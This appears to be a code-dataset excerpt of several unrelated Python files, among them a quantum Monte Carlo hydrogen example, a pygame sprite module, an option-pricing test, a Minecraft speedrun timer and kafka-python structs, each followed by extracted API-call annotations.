code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
import autograd.numpy as np
from pyCHAMP.wavefunction.wf_base import WF
from pyCHAMP.optimizer.minimize import Minimize
from pyCHAMP.sampler.metropolis import Metropolis
from pyCHAMP.sampler.hamiltonian import Hamiltonian
from pyCHAMP.solver.vmc import VMC
class Hydrogen(WF):
def __init__(self, nelec, ndim):
WF.__init__(self, nelec, ndim)
def values(self, parameters, pos):
""" Compute the value of the wave function.
Args:
parameters : parameters of th wf
x: position of the electron
Returns: values of psi
"""
beta = parameters[0]
if pos.ndim == 1:
pos = pos.reshape(1, -1)
r = np.sqrt(np.sum(pos**2, 1))
return 2*np.exp(-beta*r).reshape(-1, 1)
def nuclear_potential(self, pos):
r = np.sqrt(np.sum(pos**2, 1))
rm1 = - 1. / r
return rm1.reshape(-1, 1)
def electronic_potential(self, pos):
return 0
if __name__ == "__main__":
wf = Hydrogen(nelec=1, ndim=3)
sampler = Metropolis(nwalkers=1000, nstep=1000, step_size=3,
nelec=1, ndim=3, domain={'min': -5, 'max': 5})
sampler = Hamiltonian(nwalkers=1000, nstep=1000,
step_size=3, nelec=1, ndim=3)
optimizer = Minimize(method='bfgs', maxiter=25, tol=1E-4)
# VMS solver
vmc = VMC(wf=wf, sampler=sampler, optimizer=optimizer)
# single point
opt_param = [1.]
pos, e, s = vmc.single_point(opt_param)
print('Energy : ', e)
print('Variance : ', s)
vmc.plot_density(pos)
# optimization
init_param = [0.5]
vmc.optimize(init_param)
vmc.plot_history()
| [
"autograd.numpy.sum",
"pyCHAMP.sampler.hamiltonian.Hamiltonian",
"autograd.numpy.exp",
"pyCHAMP.wavefunction.wf_base.WF.__init__",
"pyCHAMP.solver.vmc.VMC",
"pyCHAMP.optimizer.minimize.Minimize",
"pyCHAMP.sampler.metropolis.Metropolis"
]
| [((1055, 1157), 'pyCHAMP.sampler.metropolis.Metropolis', 'Metropolis', ([], {'nwalkers': '(1000)', 'nstep': '(1000)', 'step_size': '(3)', 'nelec': '(1)', 'ndim': '(3)', 'domain': "{'min': -5, 'max': 5}"}), "(nwalkers=1000, nstep=1000, step_size=3, nelec=1, ndim=3, domain=\n {'min': -5, 'max': 5})\n", (1065, 1157), False, 'from pyCHAMP.sampler.metropolis import Metropolis\n'), ((1192, 1260), 'pyCHAMP.sampler.hamiltonian.Hamiltonian', 'Hamiltonian', ([], {'nwalkers': '(1000)', 'nstep': '(1000)', 'step_size': '(3)', 'nelec': '(1)', 'ndim': '(3)'}), '(nwalkers=1000, nstep=1000, step_size=3, nelec=1, ndim=3)\n', (1203, 1260), False, 'from pyCHAMP.sampler.hamiltonian import Hamiltonian\n'), ((1303, 1350), 'pyCHAMP.optimizer.minimize.Minimize', 'Minimize', ([], {'method': '"""bfgs"""', 'maxiter': '(25)', 'tol': '(0.0001)'}), "(method='bfgs', maxiter=25, tol=0.0001)\n", (1311, 1350), False, 'from pyCHAMP.optimizer.minimize import Minimize\n'), ((1377, 1425), 'pyCHAMP.solver.vmc.VMC', 'VMC', ([], {'wf': 'wf', 'sampler': 'sampler', 'optimizer': 'optimizer'}), '(wf=wf, sampler=sampler, optimizer=optimizer)\n', (1380, 1425), False, 'from pyCHAMP.solver.vmc import VMC\n'), ((326, 356), 'pyCHAMP.wavefunction.wf_base.WF.__init__', 'WF.__init__', (['self', 'nelec', 'ndim'], {}), '(self, nelec, ndim)\n', (337, 356), False, 'from pyCHAMP.wavefunction.wf_base import WF\n'), ((715, 734), 'autograd.numpy.sum', 'np.sum', (['(pos ** 2)', '(1)'], {}), '(pos ** 2, 1)\n', (721, 734), True, 'import autograd.numpy as np\n'), ((841, 860), 'autograd.numpy.sum', 'np.sum', (['(pos ** 2)', '(1)'], {}), '(pos ** 2, 1)\n', (847, 860), True, 'import autograd.numpy as np\n'), ((751, 768), 'autograd.numpy.exp', 'np.exp', (['(-beta * r)'], {}), '(-beta * r)\n', (757, 768), True, 'import autograd.numpy as np\n')] |
from braintree.configuration import Configuration
from braintree.resource import Resource
class AccountUpdaterDailyReport(Resource):
def __init__(self, gateway, attributes):
Resource.__init__(self, gateway, attributes)
if "report_url" in attributes:
self.report_url = attributes.pop("report_url")
if "report_date" in attributes:
self.report_date = attributes.pop("report_date")
def __repr__(self):
detail_list = ["report_url", "report_date"]
return super(AccountUpdaterDailyReport, self).__repr__(detail_list)
| [
"braintree.resource.Resource.__init__"
]
| [((188, 232), 'braintree.resource.Resource.__init__', 'Resource.__init__', (['self', 'gateway', 'attributes'], {}), '(self, gateway, attributes)\n', (205, 232), False, 'from braintree.resource import Resource\n')] |
import pygame
import pygame.gfxdraw
from constants import Constants
class Balls(object):
def __init__(self, all_sprites, all_balls):
self.all_sprites = all_sprites
self.all_balls = all_balls
def spawn_ball(self, pos, vel, team):
# Todo: Figure out how to spawn multiple balls with some sort of delay
ball = Ball(pos, vel, team)
self.all_sprites.add(ball)
self.all_balls.add(ball)
def ball_test(self):
print("This is a Ball Test!")
print(self)
def update(self):
print(self.__dict__)
print(type(self))
class Ball(pygame.sprite.Sprite):
def __init__(self, pos, vel, team):
super().__init__()
self.color = team
self.file = Constants.BALL_TEAMS[self.color]
self.rad = int(Constants.BALL_SIZE/2)
self.image = pygame.Surface([Constants.BALL_SIZE, Constants.BALL_SIZE], pygame.SRCALPHA)
pygame.draw.circle(self.image, self.file, (self.rad, self.rad), self.rad)
self.x_pos = pos[0]
self.y_pos = pos[1]
self.rect = self.image.get_rect(center=(self.x_pos, self.y_pos))
self.dx = vel[0]
self.dy = vel[1]
def update(self):
self.check_boundary()
self.x_pos += self.dx
self.y_pos += self.dy
self.rect.center = [self.x_pos, self.y_pos]
# self.rect.center = pygame.mouse.get_pos() # has sprite follow the mouse
def check_boundary(self):
if not Constants.PLAYER_WIDTH <= self.x_pos <= (Constants.PLAYER_WIDTH+Constants.BOARD_WIDTH):
self.dx = -1*self.dx
if not 0 <= self.y_pos <= Constants.SCREEN_HEIGHT:
self.dy = -1*self.dy
| [
"pygame.draw.circle",
"pygame.Surface"
]
| [((851, 926), 'pygame.Surface', 'pygame.Surface', (['[Constants.BALL_SIZE, Constants.BALL_SIZE]', 'pygame.SRCALPHA'], {}), '([Constants.BALL_SIZE, Constants.BALL_SIZE], pygame.SRCALPHA)\n', (865, 926), False, 'import pygame\n'), ((935, 1008), 'pygame.draw.circle', 'pygame.draw.circle', (['self.image', 'self.file', '(self.rad, self.rad)', 'self.rad'], {}), '(self.image, self.file, (self.rad, self.rad), self.rad)\n', (953, 1008), False, 'import pygame\n')] |
from unittest import TestCase
from options.pricing.binomial_trees import BinomialTreePricer
from options.option import OptionType, Option
class BinomialTreeTestCase(TestCase):
def test_basic(self):
"""European option, spot price 50, strike price 52, risk free interest rate 5%
expiry 2 years, volatility 30%
"""
pricer = BinomialTreePricer(steps=100)
option = Option(OptionType.PUT, 50, 52, 0.05, 2, 0.3)
result = pricer.price_option(option)
self.assertEqual(6.7781, result)
| [
"options.option.Option",
"options.pricing.binomial_trees.BinomialTreePricer"
]
| [((362, 391), 'options.pricing.binomial_trees.BinomialTreePricer', 'BinomialTreePricer', ([], {'steps': '(100)'}), '(steps=100)\n', (380, 391), False, 'from options.pricing.binomial_trees import BinomialTreePricer\n'), ((409, 453), 'options.option.Option', 'Option', (['OptionType.PUT', '(50)', '(52)', '(0.05)', '(2)', '(0.3)'], {}), '(OptionType.PUT, 50, 52, 0.05, 2, 0.3)\n', (415, 453), False, 'from options.option import OptionType, Option\n')] |
import atexit
import os
import sys
import platform
import json
import glob
import datetime
import time
import threading
import tkinter as tk
from pynput import mouse
from pathlib import Path
from playsound import playsound
from enum import Enum
import copy
#"THE BEER-WARE LICENSE" (Revision 42):
#bleach86 wrote this file. As long as you retain this notice you can do whatever you want with this stuff.
#If we meet some day, and you think this stuff is worth it, you can buy me a beer in return
input_fil = Path("/Users/sharpieman20/MCtimer/MCtimer") / "input.txt"
# continuously read from input file every 10ms
# when you get a "reset timer" message, reset the timer
#
# class Category:
# def __init__():
# self.actions = []
# self.attempts = []
# # convert actions to attempts
# def read():
# def write():
# class Actions(Enum):
# CREATE_WORLD = 0
# START = 1
# class Attempt:
stage = 0
ind = 0
time_count = 0
rsg = [
("World Created", True),
([
"Savannah",
"Desert",
"Plains",
"Other"
], False),
([
"0-15",
"15-30",
"30-45",
"45-60",
"60-75",
"75+"
], False),
([
"Iron",
"Logs",
"Feathers",
"Wool",
"Gravel"
], True),
("Enter Nether", True),
("Find Fortress", True),
("Find Spawner", True),
("Exit Spawner", True),
("Exit Nether", True),
("Tower Build Start", True),
("Tower Build Finished", True),
("Tower Leave", True),
("Enter Stronghold", True),
("Enter End", True),
("Finish", True)
]
cur_stages = {}
json_file = 'mct_config.json'
with open(json_file) as json_file:
data2 = json.load(json_file)
if data2['borderless'] == 'true':
data2['borderless']
else:
data2['borderless'] = False
running_path = Path.cwd()
NUM_CHARS = 11
system_type = platform.system()
if system_type == 'Linux':
directory = os.path.expanduser(data2['linux_saves'])
elif system_type == 'Darwin':
directory = os.path.expanduser(data2['mac_saves'])
elif system_type == 'Windows':
directory = os.path.expanduser(data2['windows_saves'])
amount2 = 0
last_amount = 0
window = tk.Tk()
# bg = BindGlobal(widget=window)
window.text = tk.StringVar()
window.text2 = tk.StringVar()
window.text3 = tk.StringVar()
window.text4 = tk.StringVar()
window.geometry("{}x{}".format(data2["width"], data2["height"]))
window.configure(bg='black')
rt = time.time()
old_version = False
did_change = False
count = 0
ig = 0
base = 0
program_time = 0
metronome_armed = False
metronome_running = False
metronome_active = False
metronome_beats = int(data2['metronome_beats'])
listener = None
metronome_time = 0
base_update = int(data2['base_update'])
rta_update = int(data2['rta_update']) * base_update
metronome_bpm = int(data2['metronome_bpm'])
metronome_interval = 0
if data2['auto_start'] == 'true':
click1 = 1
click2 = 1
else:
click1 = 0
click2 = 0
cur_fil = None
world_base_time = 0
def get_time():
global last_amount
global old_version
global amount2
global ig
global did_change
# print("-------------------------")
if data2['1.7+'] == 'false':
try:
global cur_fil
global world_base_time
mc_dir = Path(directory).parent
stats_dir = mc_dir / "stats"
os.chdir(stats_dir)
json_file = glob.glob('*.dat')
stats_file = json_file[0]
amount = 0
with open(stats_file) as timer_file:
# print(timer_file)
data = json.load(timer_file)
for item in data["stats-change"]:
if "1100" in item:
amount = item["1100"]
# print(amount)
latest = max([os.path.join(directory,d) for d in os.listdir(directory)], key=os.path.getmtime)
# print(latest)
if latest != cur_fil:
cur_fil = latest
world_base_time = amount
# print("world base time now {}".format(world_base_time))
# print(amount)
amount2 = float(amount - world_base_time) / 20
# print(amount2)
run_time = str(datetime.timedelta(seconds=amount2, milliseconds=0.5))
# print(run_time)
if last_amount == amount:
ig = 0
return run_time[:-3]
else:
did_change = True
# print(latest + "\nTime: " + run_time)
last_amount = amount
ig = 0
return run_time[:-3]
except:
ig = 1
return '0:00:00.000'
else:
try:
latest = max([os.path.join(directory,d) for d in os.listdir(directory)], key=os.path.getmtime)
if system_type == "Linux" or system_type == "Darwin":
os.chdir(latest + '/stats/')
else:
os.chdir(latest + '\\stats\\')
json_file = glob.glob('*.json')
timer = json_file[0]
with open(timer) as json_file:
data = json.load(json_file)
try:
amount = data['stats']['minecraft:custom']['minecraft:play_one_minute']
except:
amount = data['stat.playOneMinute']
old_version = True
json_file.close()
amount2 = float(amount) / 20
run_time = str(datetime.timedelta(seconds=amount2, milliseconds=0.5))
if last_amount == amount:
ig = 0
return run_time[:-3]
else:
did_change = True
print(latest + "\nTime: " + run_time)
last_amount = amount
ig = 0
return run_time[:-3]
except:
ig = 1
return '0:00:00.000'
def window2():
font_name = data2['font_name']
rta_font_size = data2['rta_font_size']
igt_font_size = data2['igt_font_size']
font_modifiers = data2['font_modifiers']
rta_font = (font_name, rta_font_size, font_modifiers)
igt_font = (font_name, igt_font_size, font_modifiers)
greeting = tk.Label(fg=data2['rta_color'], bg=data2['bg_color'], font=rta_font, textvariable=window.text)
greeting.pack()
if data2['show_igt'] == 'true':
greeting2 = tk.Label(fg=data2['igt_color'], bg=data2['bg_color'], font=igt_font, textvariable=window.text2)
greeting2.pack()
if data2['use_counter'] == 'true':
greeting3 = tk.Label(fg=data2['counter_color'], bg=data2['bg_color'], font=rta_font, textvariable=window.text3)
greeting3.pack()
# bg.gbind(data2['increment'], on_increment_counter)
# greeting.after(0, update_count)
if data2['use_splits'] == 'true':
split_font_size = data2['split_font_size']
split_font = (font_name, split_font_size, font_modifiers)
greeting4 = tk.Label(fg=data2['split_color'], bg=data2['bg_color'], font=split_font, textvariable=window.text4)
greeting4.pack()
# bg.gbind(data2['cycle'], cycle)
# bg.gbind(data2['split'], split)
# bg.gbind(data2['skip'], skip)
reset_split()
# greeting.after(0, update_count)
# bg.gbind(data2['pause'], on_press)
# bg.gbind(data2['reset_start'], on_press2)
# if data2['enable_metronome'] == 'true':
# bg.gbind(data2['arm_metronome'], arm_metronome)
# bg.gbind(data2['start_metronome'], start_metronome)
# bg.gbind(data2['exit'], clicked3)
# bg.bind(data2['start_metronome'], start_metronome)
''' this works for the window detecting right click '''
# window.bind(data2['start_metronome'], start_metronome)
#window.bind("<Button-1>", clicked)
#window.bind("<Button-3>", clicked2)
greeting.after(0, tick_time)
greeting.after(0, update_time2)
window.title("MCtimer")
window.attributes('-topmost', True)
window.overrideredirect(data2['borderless'])
window.geometry(data2['window_pos'])
window.mainloop()
def update_time():
global rt
global program_time
# do_metronome_action()
if click1 == 1:
window.text.set(real_time())
elif click1 == 0:
# rt = time.time()
diff = amount2 - base
rtc = str(datetime.timedelta(seconds=diff))
diff_txt = rtc[:-3]
# print(diff_txt)
window.text.set(diff_txt)
# print(base)
if click2 == 0:
rt = time.time()
window.text.set("0:00:00.000")
# window.after(int(data2['rta_update'])/10, update_time)
def tick_time():
global time_count
global metronome_armed
time_count += 1
update_time()
if metronome_armed or time_count % 20 == 0:
check_input()
window.after(rta_update, tick_time)
def check_input():
txt = input_fil.read_text()
input_fil.write_text("")
global metronome_armed
# print(txt)
if "start_metronome" in txt:
print(data2['enable_metronome'])
if data2['enable_metronome'] == 'true':
start_metronome(None)
if "arm_metronome" in txt:
metronome_armed = True
if "pause_timer" in txt:
left_click()
if "start_timer" in txt:
right_click()
def update_time2():
window.text2.set(get_time())
window.after(1000, update_time2)
def update_count():
count_str = str(count)
text_str = ""
for i in range(0, int(NUM_CHARS/2)):
text_str += " "
text_str += count_str
for i in range(0, int(NUM_CHARS/2)):
text_str += " "
window.text3.set(text_str)
window.after(rta_update, update_count)
# def update_split()
def on_press(event):
left_click()
def on_press2(event):
right_click()
def update_split():
global stage
text_str = cur_stages[stage][0]
if type(text_str) == type([]):
text_str = text_str[ind]
window.text4.set(text_str)
def reset_split():
global ind, stage, cur_stages
ind = 0
stage = 0
cur_stages = copy.deepcopy(rsg)
update_split()
def cycle(event):
global ind, stage
ind += 1
item = cur_stages[stage]
if type(item[0]) == type([]):
if ind == len(item[0]):
ind = 0
else:
ind = 0
update_split()
def split(event):
global stage, ind
item = cur_stages[stage]
if item[1]:
if type(item[0]) == type([]):
item[0].remove(item[0][ind])
if len(item[0]) == 0:
stage += 1
ind = 0
update_split()
return
stage += 1
ind = 0
update_split()
def skip(event):
global stage
stage += 1
update_split()
def on_increment_counter(event):
increment_counter()
def clicked3(event):
sys.exit(1)
def clicked2(event):
right_click()
def clicked(event):
left_click()
def write_to_log(text):
pass
# log_dir = Path("/Users/sharpieman20/MCtimer/MCtimer/logs")
# log_fil = log_dir / data2["current_section"]
# log_fil.touch()
# log_fil = log_fil.open("a")
# log_fil.write(str(text)+"\n")
def left_click():
global click1
if click1 == 1:
click1 = 0
elif click1 == 0:
click1 = 0
# global base
# write_to_log(str(amount2-base))
# base = amount2
def right_click():
global click1
global click2
global count
global did_change
count = 0
did_change = True
if click2 == 1:
click1 = 0
click2 = 0
elif click2 == 0:
click2 = 1
click1 = 1
# print(float(amount2))
# print("hehe")
global base
write_to_log("reset {}".format(str(amount2-base)))
base = amount2
def increment_counter():
global count
count += 1
''' METRONOME CODE '''
''' Metronome mouse listener '''
def exit_handler():
global listener
mouse.Listener.stop(listener)
window.quit()
atexit.register(exit_handler)
def listen_for_right_click():
def on_click(x, y, button, pressed):
# print(button)
if pressed:
if pressed and button == mouse.Button.right:
start_metronome(None)
return False
# mouse.Listener.stop(listener)
# print("Right Click Detected (pressed)")
with mouse.Listener(on_click=on_click) as listener:
# listener.start()
listener.join()
''' Sound playing code '''
def play_file_named(str_name):
playsound((running_path / str_name).as_posix(), block = True)
def play_up_beep():
play_file_named("MetronomeHit.mp3")
def play_normal_beep():
play_file_named("MetronomeBase.mp3")
def play_metronome_preset():
time.sleep(0.06)
play_file_named("MetronomePreset.mp3")
''' Metronome functions '''
def arm_metronome(event):
global metronome_armed
global metronome_running
if metronome_armed or metronome_running:
return
metronome_armed = True
# x = threading.Thread(target=listen_for_right_click, daemon=True)
# x.start()
listen_for_right_click()
print("armed and ready")
def start_metronome(event):
run_metronome()
# print(metronome_running)
# arm_metronome = False
def run_metronome():
global metronome_time
global metronome_interval
global metronome_running
if data2['has_metronome_preset'] == 'true':
play_metronome_preset()
metronome_running = False
return
metronome_time = 0
base_time = round(time.time()*1000)
metronome_interval = int(100 * 60 / metronome_bpm)*10
time.sleep(float(data2['beat_offset'])*metronome_interval/1000.0)
# print(metronome_interval)555
while metronome_running:
start_time = round(time.time()*1000) - base_time
do_metronome_action()
end_time = round(time.time()*1000) - base_time
elapsed = end_time - start_time
time.sleep((metronome_interval - elapsed)/1000.0)
# print("{} {} {}".format(start_time, end_time, ))
metronome_time += metronome_interval
def do_metronome_action():
global metronome_running
global metronome_interval
if not metronome_running:
return
# print(metronome_interval)
# metronome_time = program_time - metronome_start_time
if metronome_time >= metronome_interval * metronome_beats:
metronome_running = False
return
# print(metronome_time)
# print(metronome_interval)
# print(time.time()*1000)
if metronome_time % metronome_interval == 0:
if (metronome_time % (metronome_interval*4)) == metronome_interval*3:
# print("up beep")
play_up_beep()
# pass
else:
# print("normal beep")
play_normal_beep()
# pass
# print(time.time()*1000)
# print()
def real_time():
global rt
global click1
global click2
global amount2
global old_version
global stage
global ig
global did_change
if data2['auto_adjust'] == 'true':
# print(did_change)
# print(base)
if did_change:
rt = float(time.time()) - float(amount2)
if data2['allow_offset'] == 'true':
rt += base
did_change = False
if data2['auto_start'] == 'true':
if ig == 1:
rt = time.time()
click1 = 1
click2 = 1
stage = 0
reset_split()
return '0:00:00.000'
elif click1 == 1:
if old_version == True and stage == 0:
ig = 0
rt = float(time.time()) - float(amount2)
rtc = str(datetime.timedelta(seconds=rt))
stage = 1
print("stop")
return rtc[:-3]
else:
ig = 0
rt2 = time.time()
real_time = rt2 - rt
rtc = str(datetime.timedelta(seconds=real_time))
# rt = float(amount2) - float(base)
# rtc = str(datetime.timedelta(seconds=rt))
return rtc[:-3]
else:
if click1 == 1:
rt2 = time.time()
real_time = rt2 - rt
rtc = str(datetime.timedelta(seconds=real_time))
return rtc[:-3]
def main():
window2()
main() | [
"time.sleep",
"tkinter.Label",
"sys.exit",
"copy.deepcopy",
"datetime.timedelta",
"os.listdir",
"pathlib.Path",
"tkinter.StringVar",
"platform.system",
"atexit.register",
"glob.glob",
"os.path.expanduser",
"pathlib.Path.cwd",
"pynput.mouse.Listener.stop",
"time.time",
"pynput.mouse.Listener",
"os.path.join",
"os.chdir",
"tkinter.Tk",
"json.load"
]
| [((1890, 1900), 'pathlib.Path.cwd', 'Path.cwd', ([], {}), '()\n', (1898, 1900), False, 'from pathlib import Path\n'), ((1930, 1947), 'platform.system', 'platform.system', ([], {}), '()\n', (1945, 1947), False, 'import platform\n'), ((2244, 2251), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (2249, 2251), True, 'import tkinter as tk\n'), ((2299, 2313), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2311, 2313), True, 'import tkinter as tk\n'), ((2329, 2343), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2341, 2343), True, 'import tkinter as tk\n'), ((2359, 2373), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2371, 2373), True, 'import tkinter as tk\n'), ((2389, 2403), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2401, 2403), True, 'import tkinter as tk\n'), ((2503, 2514), 'time.time', 'time.time', ([], {}), '()\n', (2512, 2514), False, 'import time\n'), ((12135, 12164), 'atexit.register', 'atexit.register', (['exit_handler'], {}), '(exit_handler)\n', (12150, 12164), False, 'import atexit\n'), ((515, 558), 'pathlib.Path', 'Path', (['"""/Users/sharpieman20/MCtimer/MCtimer"""'], {}), "('/Users/sharpieman20/MCtimer/MCtimer')\n", (519, 558), False, 'from pathlib import Path\n'), ((1751, 1771), 'json.load', 'json.load', (['json_file'], {}), '(json_file)\n', (1760, 1771), False, 'import json\n'), ((1991, 2031), 'os.path.expanduser', 'os.path.expanduser', (["data2['linux_saves']"], {}), "(data2['linux_saves'])\n", (2009, 2031), False, 'import os\n'), ((6402, 6500), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['rta_color']", 'bg': "data2['bg_color']", 'font': 'rta_font', 'textvariable': 'window.text'}), "(fg=data2['rta_color'], bg=data2['bg_color'], font=rta_font,\n textvariable=window.text)\n", (6410, 6500), True, 'import tkinter as tk\n'), ((10249, 10267), 'copy.deepcopy', 'copy.deepcopy', (['rsg'], {}), '(rsg)\n', (10262, 10267), False, 'import copy\n'), ((10994, 11005), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (11002, 11005), False, 'import sys\n'), ((12081, 12110), 'pynput.mouse.Listener.stop', 'mouse.Listener.stop', (['listener'], {}), '(listener)\n', (12100, 12110), False, 'from pynput import mouse\n'), ((12913, 12929), 'time.sleep', 'time.sleep', (['(0.06)'], {}), '(0.06)\n', (12923, 12929), False, 'import time\n'), ((2078, 2116), 'os.path.expanduser', 'os.path.expanduser', (["data2['mac_saves']"], {}), "(data2['mac_saves'])\n", (2096, 2116), False, 'import os\n'), ((6573, 6672), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['igt_color']", 'bg': "data2['bg_color']", 'font': 'igt_font', 'textvariable': 'window.text2'}), "(fg=data2['igt_color'], bg=data2['bg_color'], font=igt_font,\n textvariable=window.text2)\n", (6581, 6672), True, 'import tkinter as tk\n'), ((6754, 6857), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['counter_color']", 'bg': "data2['bg_color']", 'font': 'rta_font', 'textvariable': 'window.text3'}), "(fg=data2['counter_color'], bg=data2['bg_color'], font=rta_font,\n textvariable=window.text3)\n", (6762, 6857), True, 'import tkinter as tk\n'), ((7157, 7260), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['split_color']", 'bg': "data2['bg_color']", 'font': 'split_font', 'textvariable': 'window.text4'}), "(fg=data2['split_color'], bg=data2['bg_color'], font=split_font,\n textvariable=window.text4)\n", (7165, 7260), True, 'import tkinter as tk\n'), ((8709, 8720), 'time.time', 'time.time', ([], {}), '()\n', (8718, 8720), False, 'import time\n'), ((12528, 12561), 'pynput.mouse.Listener', 'mouse.Listener', ([], {'on_click': 'on_click'}), '(on_click=on_click)\n', (12542, 12561), False, 'from pynput import mouse\n'), ((14127, 14178), 'time.sleep', 'time.sleep', (['((metronome_interval - elapsed) / 1000.0)'], {}), '((metronome_interval - elapsed) / 1000.0)\n', (14137, 14178), False, 'import time\n'), ((2164, 2206), 'os.path.expanduser', 'os.path.expanduser', (["data2['windows_saves']"], {}), "(data2['windows_saves'])\n", (2182, 2206), False, 'import os\n'), ((3419, 3438), 'os.chdir', 'os.chdir', (['stats_dir'], {}), '(stats_dir)\n', (3427, 3438), False, 'import os\n'), ((3464, 3482), 'glob.glob', 'glob.glob', (['"""*.dat"""'], {}), "('*.dat')\n", (3473, 3482), False, 'import glob\n'), ((5125, 5144), 'glob.glob', 'glob.glob', (['"""*.json"""'], {}), "('*.json')\n", (5134, 5144), False, 'import glob\n'), ((13724, 13735), 'time.time', 'time.time', ([], {}), '()\n', (13733, 13735), False, 'import time\n'), ((15587, 15598), 'time.time', 'time.time', ([], {}), '()\n', (15596, 15598), False, 'import time\n'), ((16419, 16430), 'time.time', 'time.time', ([], {}), '()\n', (16428, 16430), False, 'import time\n'), ((3341, 3356), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (3345, 3356), False, 'from pathlib import Path\n'), ((3655, 3676), 'json.load', 'json.load', (['timer_file'], {}), '(timer_file)\n', (3664, 3676), False, 'import json\n'), ((4307, 4360), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'amount2', 'milliseconds': '(0.5)'}), '(seconds=amount2, milliseconds=0.5)\n', (4325, 4360), False, 'import datetime\n'), ((4990, 5018), 'os.chdir', 'os.chdir', (["(latest + '/stats/')"], {}), "(latest + '/stats/')\n", (4998, 5018), False, 'import os\n'), ((5070, 5100), 'os.chdir', 'os.chdir', (["(latest + '\\\\stats\\\\')"], {}), "(latest + '\\\\stats\\\\')\n", (5078, 5100), False, 'import os\n'), ((5257, 5277), 'json.load', 'json.load', (['json_file'], {}), '(json_file)\n', (5266, 5277), False, 'import json\n'), ((8532, 8564), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'diff'}), '(seconds=diff)\n', (8550, 8564), False, 'import datetime\n'), ((16486, 16523), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'real_time'}), '(seconds=real_time)\n', (16504, 16523), False, 'import datetime\n'), ((3868, 3894), 'os.path.join', 'os.path.join', (['directory', 'd'], {}), '(directory, d)\n', (3880, 3894), False, 'import os\n'), ((4814, 4840), 'os.path.join', 'os.path.join', (['directory', 'd'], {}), '(directory, d)\n', (4826, 4840), False, 'import os\n'), ((5620, 5673), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'amount2', 'milliseconds': '(0.5)'}), '(seconds=amount2, milliseconds=0.5)\n', (5638, 5673), False, 'import datetime\n'), ((13964, 13975), 'time.time', 'time.time', ([], {}), '()\n', (13973, 13975), False, 'import time\n'), ((14049, 14060), 'time.time', 'time.time', ([], {}), '()\n', (14058, 14060), False, 'import time\n'), ((15363, 15374), 'time.time', 'time.time', ([], {}), '()\n', (15372, 15374), False, 'import time\n'), ((16092, 16103), 'time.time', 'time.time', ([], {}), '()\n', (16101, 16103), False, 'import time\n'), ((3903, 3924), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (3913, 3924), False, 'import os\n'), ((4849, 4870), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (4859, 4870), False, 'import os\n'), ((15909, 15939), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'rt'}), '(seconds=rt)\n', (15927, 15939), False, 'import datetime\n'), ((16167, 16204), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'real_time'}), '(seconds=real_time)\n', (16185, 16204), False, 'import datetime\n'), ((15853, 15864), 'time.time', 'time.time', ([], {}), '()\n', (15862, 15864), False, 'import time\n')] |
""" Other useful structs """
from __future__ import absolute_import
from collections import namedtuple
"""A topic and partition tuple
Keyword Arguments:
topic (str): A topic name
partition (int): A partition id
"""
TopicPartition = namedtuple("TopicPartition",
["topic", "partition"])
"""A Kafka broker metadata used by admin tools.
Keyword Arguments:
nodeID (int): The Kafka broker id.
host (str): The Kafka broker hostname.
port (int): The Kafka broker port.
rack (str): The rack of the broker, which is used to in rack aware
partition assignment for fault tolerance.
Examples: `RACK1`, `us-east-1d`. Default: None
"""
BrokerMetadata = namedtuple("BrokerMetadata",
["nodeId", "host", "port", "rack"])
"""A topic partition metadata describing the state in the MetadataResponse.
Keyword Arguments:
topic (str): The topic name of the partition this metadata relates to.
partition (int): The id of the partition this metadata relates to.
leader (int): The id of the broker that is the leader for the partition.
replicas (List[int]): The ids of all brokers that contain replicas of the
partition.
isr (List[int]): The ids of all brokers that contain in-sync replicas of
the partition.
error (KafkaError): A KafkaError object associated with the request for
this partition metadata.
"""
PartitionMetadata = namedtuple("PartitionMetadata",
["topic", "partition", "leader", "replicas", "isr", "error"])
"""The Kafka offset commit API
The Kafka offset commit API allows users to provide additional metadata
(in the form of a string) when an offset is committed. This can be useful
(for example) to store information about which node made the commit,
what time the commit was made, etc.
Keyword Arguments:
offset (int): The offset to be committed
metadata (str): Non-null metadata
"""
OffsetAndMetadata = namedtuple("OffsetAndMetadata",
# TODO add leaderEpoch: OffsetAndMetadata(offset, leaderEpoch, metadata)
["offset", "metadata"])
"""An offset and timestamp tuple
Keyword Arguments:
offset (int): An offset
timestamp (int): The timestamp associated to the offset
"""
OffsetAndTimestamp = namedtuple("OffsetAndTimestamp",
["offset", "timestamp"])
MemberInformation = namedtuple("MemberInformation",
["member_id", "client_id", "client_host", "member_metadata", "member_assignment"])
GroupInformation = namedtuple("GroupInformation",
["error_code", "group", "state", "protocol_type", "protocol", "members", "authorized_operations"])
"""Define retry policy for async producer
Keyword Arguments:
Limit (int): Number of retries. limit >= 0, 0 means no retries
backoff_ms (int): Milliseconds to backoff.
retry_on_timeouts:
"""
RetryOptions = namedtuple("RetryOptions",
["limit", "backoff_ms", "retry_on_timeouts"])
| [
"collections.namedtuple"
]
